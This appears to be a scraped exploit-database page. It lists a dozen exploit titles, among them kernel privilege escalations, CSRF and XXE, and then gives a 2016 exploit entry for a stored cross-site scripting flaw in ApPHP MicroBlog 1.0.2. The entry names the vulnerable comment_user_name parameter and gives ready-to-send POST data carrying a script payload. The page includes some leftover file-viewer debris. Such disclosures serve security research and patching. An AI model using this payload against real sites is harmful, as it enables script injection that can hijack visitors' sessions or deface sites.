f8b17d14a1
12 new exploits Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection Android - 'gpsOneXtra' Data Files Denial of Service Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
26 lines
925 B
Text
Executable file
26 lines
925 B
Text
Executable file
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
|
|
Site Scripting
|
|
# Author : Besim
|
|
# Google Dork :
|
|
# Date : 12/10/2016
|
|
# Type : webapps
|
|
# Platform : PHP
|
|
# Vendor Homepage : -
|
|
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
|
|
|
|
Description :
|
|
|
|
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
|
|
|
|
Stored XSS Payload ( Comments ): *
|
|
|
|
# Vulnerable URL :
|
|
http://site_name/path/index.php?page=posts&post_id= - Post comment section
|
|
# Vuln. Parameter : comment_user_name
|
|
|
|
############ POST DATA ############
|
|
|
|
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
|
|
your comment
|
|
|
|
############ ######################
|